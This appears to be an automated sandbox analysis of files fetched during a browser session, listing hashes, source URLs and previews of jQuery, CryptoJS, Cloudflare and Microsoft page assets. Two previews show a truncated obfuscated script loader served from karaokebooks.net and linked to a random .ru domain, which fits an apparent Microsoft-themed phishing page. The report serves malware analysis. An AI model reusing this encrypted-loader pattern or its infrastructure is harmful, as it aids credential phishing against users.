                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):26288
                                                                                                                              Entropy (8bit):7.984195877171481
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                                              MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                              SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                              SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                              SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                              Malicious:false
                                                                                                                              URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                                              Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (47694)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):47695
                                                                                                                              Entropy (8bit):5.401531363850578
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                                                                              MD5:1685878B80EECB073E51C13F17A5E530
                                                                                                                              SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                                                                              SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                                                                              SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                                                                              Malicious:false
                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.js
                                                                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):167730
                                                                                                                              Entropy (8bit):5.045981547409661
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxW:clZAP+keedJ
                                                                                                                              MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                                                                              SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                                                                              SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                                                                              SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                                                                              Malicious:false
                                                                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                                                                              Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):48316
                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                              Malicious:false
                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (1329), with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1968
                                                                                                                              Entropy (8bit):5.980011785633419
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:A7bdgrCLZuiNREGIpb5iZOrMCfcG6b19hb8lwmuIwnwp:AlgrCLZ6lpbEwZ0G6/hb8FuI3
                                                                                                                              MD5:E55496B1A9D30483EB021AC007EB7C7F
                                                                                                                              SHA1:C0140A8A7FFC9E0C11C2FAF73F750BAD390EA6F6
                                                                                                                              SHA-256:A6B50DD692F0BCF1DB1A74F12AFCA096039899E6B070F345F169BB721BC88968
                                                                                                                              SHA-512:848BD4879DC3F783FA1481F9913E8966EF47CCDA3E9BD88B1450E36F69D4B2831B3082104B4FA6CE2023B4FCCBD68A172B42D85F14A8CDC967E5F9C93F602ABD
                                                                                                                              Malicious:false
                                                                                                                              Preview: var DBBdSTGXSVjVdgiz = document.createElement("script");..DBBdSTGXSVjVdgiz.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(DBBdSTGXSVjVdgiz);..DBBdSTGXSVjVdgiz.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoienhzQVc4XC9yRVwvQ0crTVZJK1dhakdZRTdWbmlNYkpoanBFXC9NM2s0NVNaQms3cDNcL3ZFZlB1cTZUWlU1Mm5ZQkJ6R0VvTHdWV21ET2QxazdqcGNoVEtpUUVaTkEzM0JVeGsrVDdzS0tkbEdJWkROYXV5R1MwOHJaWmRqQWNUT21ZbFBCWHRJaVEyMVNGNDdkREJCNDFIbENJRWFQSWttNHE4a25mamp6aFVtT2ZqekZcL0w2ZEpqdmZyU0Jza2FYMEp0RHpGU3lJcXBMcnVNbjBmV1h1WjI1UURWcUhobXFUQWhMUE4ycDA4YzF1cDBIQ3pWU1hGM2M5dTF6Q2xmK3c4Mlwva2xNQzBlRVRLMkNQekxUKzNNZVN4RVVrejFLc0ZXTDJzWE9INjg5ZDJcL2dCM2Y0VGdTK05kaXZJNHFEMlNEeUN0U0pPejlZbkNlVTkxQmQ0T2lmdVQ1T1gwMWt2c2xwM1EwQXhXS0JXTXhLZU1wNUR2N1FxKzdKTnRYUnNIa05SeHBcL0thcDVHXC9HSkhFQjBSYnBBOUpheithMnk3V0tvUVJvU3k1bGUxMmtENit3QW1FQmtVSFRpMFk5VzRkMCtoY1FtQjdrcDV0TFFodEQyOHl5RUUzemVNUWpFWkVBdEY2VnlwTUlPb2tsV2ZqV1dhZlZ3U0lBXC9aeU1XblwvZEFCXC93dG
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):48316
                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                              Malicious:false
                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4054
                                                                                                                              Entropy (8bit):7.797012573497454
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                              Malicious:false
                                                                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):89501
                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                              Malicious:false
                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (1321), with CRLF line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):1960
                                                                                                                              Entropy (8bit):5.976117534949214
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:47bT8IXQ3qN0e2l/FyNK9+lxILKKHndNNuIwPS:4b5nAGORuIZ
                                                                                                                              MD5:5CCBCE20AA07FFE8D45B30E0CB33A254
                                                                                                                              SHA1:E613580D18BB77B69A4FC767D8539546CB2DD46E
                                                                                                                              SHA-256:FC114F89B5FD72ABE540E6B36CE249992347404BC88CEAE05490BA5EEF3D0AC4
                                                                                                                              SHA-512:75CD5B9D3D601DB39A513B097B31B0C459640CD80B466223D013BA8EF945DAD982B6BC25E98F1122D86E044D824D890ABC74EDB9AF2D30765D19D0AF3D7C0B72
                                                                                                                              Malicious:false
                                                                                                                              URL:https://karaokebooks.net/res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-clover
                                                                                                                              Preview: var SkeEcVkZSyhEDaxR = document.createElement("script");..SkeEcVkZSyhEDaxR.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(SkeEcVkZSyhEDaxR);..SkeEcVkZSyhEDaxR.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiSlY2UlNVU01kZjJYcjRmYll2YUNaV1pLZnFBOFlXVEp2b0hKRmp3T3lFRDNid3RmMElGK1VYa2NaWDY4RkpUSzZMYWdmajg3RktPSlJjMU9tSnJFV3F2Vjk5K3FQNXpqcXh6TitQZmtcL1N4NnltZllmNnlJTEN5alBtbjdOM2MxSTN4b2s4dERWcDRUdmNoc2NBQm5xVnpkYWN6YVAwdGgycWdLdTJPeUtJMU1iVndXUERoWXN4YnBkRjZZSXFGbXhGZFBkY2J1dU5MT25HWE5zd2NWMXZQb0VYZVh6XC8rZGV2VUtPS0VSMThxOVlLNkF6WTFzcFwvdHNRdVwvaG4rUU9lYUJWSjVuV1RWZlRBeUdsSGtvYkZWaFY3bjVueHJRVXd1UHh4Mzc0dkNkN1FxV0tDVVRHQlFQWDliK2FYNVwvM29haG51UTlYb1owY2lQRTRDZ1RheDhUTlQ1eUpvdFwvK3VmXC9mSXBJUkFrUnhvY2xkQW9wVkhJTFV2WVltYlwvM3dhQnArbjFud21vQ1hIaXFwczBOODVJV0NrUFc4U2VPS1JwMm9QSkpxNWh4R2RWRkhBUzhIVndmN3JpT3NXazk4cVBuUlBrNHdSYUxEcTEwUVAzanFUS3NKTW5wQ0srdm9nU3lMK0F2bXA5NVBJZjN2K0VKZzZzRmZFand6QzFxaVBhd2t6b09WbG
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              URL:https://eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru/kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQX
                                                                                                                              Preview:1
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):513
                                                                                                                              Entropy (8bit):5.350826451115093
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                                                              Malicious:false
                                                                                                                              URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):89501
                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                              Malicious:false
                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):513
                                                                                                                              Entropy (8bit):5.350826451115093
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                                                              Malicious:false
                                                                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                              Malicious:false
                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (41651)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):131537
                                                                                                                              Entropy (8bit):5.2237799798561975
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                                              Malicious:false
